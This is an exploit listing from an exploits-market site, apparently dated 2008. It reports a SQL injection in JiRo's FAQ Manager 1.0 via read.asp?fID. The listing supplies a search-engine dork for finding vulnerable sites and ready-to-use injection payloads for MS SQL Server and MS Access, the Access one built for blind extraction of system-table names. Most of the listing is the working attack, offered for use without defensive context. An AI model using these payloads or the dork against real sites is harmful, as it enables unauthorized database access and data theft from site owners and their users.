[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability

Author
Zigma
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3126
Category
web applications
Date add
07-06-2008
Platform
unsorted
=============================================================
JiRo's FAQ Manager (read.asp fID) SQL Injection Vulnerability
=============================================================



[+] Script Name     : JiRo?s FAQ Manager eXperience
[+] Version         : v 1.0
[+] Price           : _ Single Website License 34.95 $
                      _ 2 Websites License 62.95 $
                      _ 5 Websites License 139.95 $
[+] Script In short : ('JiRos FAQ Management System is an essential 
element for any webmaster, providing your customers with answers to 
specific questions on-line 24 hours a day, 7 days a week. Build a 
complete knowledge base, adding articles and creating your own topic 
based FAQ system using our feature packed administration facility ')
[+] Dork            : inurl:"read.asp?fID="

--//--> Exploit :

read.asp?fID={SQL}

__--> MS SQL Server : convert(int,(select+@@version));

__--> MS Access     : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'Bingo')%00

--//--> 



#  0day.today [2024-12-24]  #